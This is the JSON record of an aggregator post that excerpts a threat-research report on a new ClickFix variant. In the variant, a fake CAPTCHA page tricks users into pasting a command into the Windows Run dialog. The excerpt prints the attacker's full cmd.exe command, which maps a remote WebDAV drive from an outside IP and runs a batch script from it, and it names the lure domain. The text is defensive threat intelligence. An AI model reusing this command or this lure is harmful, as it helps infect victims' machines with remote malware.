{"id":223625,"date":"2026-03-13T09:28:00","date_gmt":"2026-03-13T13:28:00","guid":{"rendered":"https:\/\/news-you-need.com\/index.php\/2026\/03\/13\/investigating-a-new-click-fix-variant\/"},"modified":"2026-03-14T15:15:07","modified_gmt":"2026-03-14T19:15:07","slug":"investigating-a-new-click-fix-variant","status":"publish","type":"post","link":"https:\/\/news-you-need.com\/index.php\/2026\/03\/13\/investigating-a-new-click-fix-variant\/","title":{"rendered":"Investigating a New Click-Fix Variant"},"content":{"rendered":"<p><a href=\"https:\/\/thehackernews.com\/2026\/03\/investigating-new-click-fix-variant.html\">Investigating a New Click-Fix Variant<\/a><\/p>\n<p><a href=\"https:\/\/thehackernews.com\/2026\/03\/investigating-new-click-fix-variant.html\">https:\/\/thehackernews.com\/2026\/03\/investigating-new-click-fix-variant.html<\/a><\/p>\n<p>Publish Date: <a href=\"publish_date]\">2026-03-13 09:28:00<\/a><\/p>\n<p>Source Domain: <a href=\"thehackernews.com\">thehackernews.com<\/a><\/p>\n<p><strong>Disclaimer<\/strong>: This report has been prepared by the Threat Research Center to enhance cybersecurity awareness and support the strengthening of defense capabilities. It is based on independent research and observations of the current threat landscape available at the time of publication. The content is intended for informational and preparedness purposes only.<\/p>\n<p>Read more blogs around threat intelligence and adversary research: https:\/\/atos.net\/en\/lp\/cybershield<\/p>\n<h4 style=\"text-align: left;\"><strong>\u00a0Summary<\/strong><\/h4>\n<p>Atos Researchers identified a new variant of the popular ClickFix technique, where attackers convince the user to execute a malicious command on their own device through the Win + R shortcut. In this variation, a \u201cnet use\u201d command is used to map a network drive from an external server, after which a \u201c.cmd\u201d batch file hosted on that drive is executed. 
The script downloads a ZIP archive, unpacks it, and executes the legitimate WorkFlowy application with modified, malicious logic hidden inside the \u201c.asar\u201d archive. This acts as a C2 beacon and a dropper for the final malware payload.<\/p>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left;\">\n<tr>\n<td style=\"text-align: center;\"><img decoding=\"async\" alt=\"\" border=\"0\" data-original-height=\"251\" data-original-width=\"819\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgI3trtAac3m4CbyOoWlIcWGgQJbB2hIcdMKsrtWT9acSAAUs3llaXtiuIbYzhI4HGptQBTHZnlKN9nfuQ22yM8mszDKFZzuMHd0TqbcOngBgYC6Lr21yD6O8bXQwO-6e8TI6hq_ip3wpUkEkWWz4JdsmgcgC0s7jDisLY2RZ1marb9m2DEIHvHNpH-oxzV\/s1600\/1.png\"\/><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figure 1: High-level overview of attack flow.<\/td>\n<\/tr>\n<\/table>\n<h2 style=\"text-align: left;\">Attack overview<\/h2>\n<p>In this version, the initial attack vector is the same as in all the other ones: a web page posing as a CAPTCHA mechanism, \u201chappyglamper[.]ro\u201d. 
It prompts the user to open the Run application via \u201cWin+R\u201d, followed by \u201cCtrl+V\u201d and \u201cEnter\u201d.<\/p>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left;\">\n<tr>\n<td style=\"text-align: center;\"><img decoding=\"async\" alt=\"\" border=\"0\" data-original-height=\"601\" data-original-width=\"859\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhVCV5rgx3oWMp5a4WXJ3NP57gv655-dINgkx4LRLg8lwamGFhO1hFqFun_3KGsnLpGe5lI637hSaEb7GoR1odH6M2HRFTKEVOl33_PEVYhKvKM9J-4BdBGys59SX-X38WWHQH9i81cK_P8rnjm6QDfUZfe8vtLlciT8rrlga1l0f2VBEXyI6OJeQzYNjof\/s1600\/2.png\"\/><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figure 2: Phishing website 1<\/td>\n<\/tr>\n<\/table>\n<table cellpadding=\"0\" cellspacing=\"0\" class=\"tr-caption-container\" style=\"float: left;\">\n<tr>\n<td style=\"text-align: center;\"><img decoding=\"async\" alt=\"\" border=\"0\" data-original-height=\"552\" data-original-width=\"855\" src=\"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi7sCd3P7-nA23PlNtVj_aKDRcMNCRC5BGg6HbuBawoSAQsOUXlQswhyKvafeNK457Gn6EFnXxD-nJgW-DQDg97bfYivG_ymb2KKHR8EL9K_AYtPb5k_2P7sClDst1ujYhM_ZBs3kIhKmlQvBpGGoth6w5oyi8GrDsGrSVW_uDcV25Sgn7gCxMYTc7aQyjt\/s1600\/3.png\"\/><\/td>\n<\/tr>\n<tr>\n<td class=\"tr-caption\" style=\"text-align: center;\">Figure 3: Phishing website 2<\/td>\n<\/tr>\n<\/table>\n<p>This executes the following command:<\/p>\n<p>\u201ccmd.exe\u201d \/c net use Z: http:\/\/94.156.170[.]255\/webdav \/persistent:no &#038;&#038; \u201cZ:update.cmd\u201d &#038; net use Z: \/delete<\/p>\n<p>Typically, at this stage, attackers have used PowerShell or mshta to download and execute the next stage of the malware. Here, instead, we can see that \u201cnet use\u201d is being used to map and connect to a network drive on an external server, from which a batch script is executed. 
While not novel, these TTPs were never seen in ClickFix attacks before. Combined with the next uncommon stages of&#8230;<\/p>\n<p><a href=\"https:\/\/thehackernews.com\/2026\/03\/investigating-new-click-fix-variant.html\">Source<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Investigating a New Click-Fix Variant https:\/\/thehackernews.com\/2026\/03\/investigating-new-click-fix-variant.html Publish Date: 2026-03-13 09:28:00 Source Domain: thehackernews.com Disclaimer: This&#8230;<\/p>\n","protected":false},"author":1,"featured_media":223626,"comment_status":"closed","ping_status":"","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgAy3Jm9mBV4SvNdfv5AJ_ZIKoJSwtUVeXkiFUNwKFUN3F5j3kYJTpD1a65PEcgqX2cMT0DmtJJ7YCrYuhElQ9nhYtQkXRtQxnkpOqTgSUOCAJgO8Lv8HDWZxVuy74vgjErtUYrHPH-UrWLfLoL18i__L9a-6T1xdgMPjsTamIOab3KGcJE3kzxz5aR8tm8\/s1600\/eviden.jpg","fifu_image_alt":"","footnotes":""},"categories":[15],"tags":[24,32,25],"class_list":["post-223625","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-cybersecurity","tag-malware","tag-phishing"],"_links":{"self":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/223625"}],"collection":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/comments?post=223625"}],"version-history":[{"count":1,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/223625\/revisions"}],"predecessor-version":[{"id":223627,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/posts\/223625\/revisions\/223627"}],"wp:featuredmedia":[{"em
beddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media\/223626"}],"wp:attachment":[{"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/media?parent=223625"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/categories?post=223625"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/news-you-need.com\/index.php\/wp-json\/wp\/v2\/tags?post=223625"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}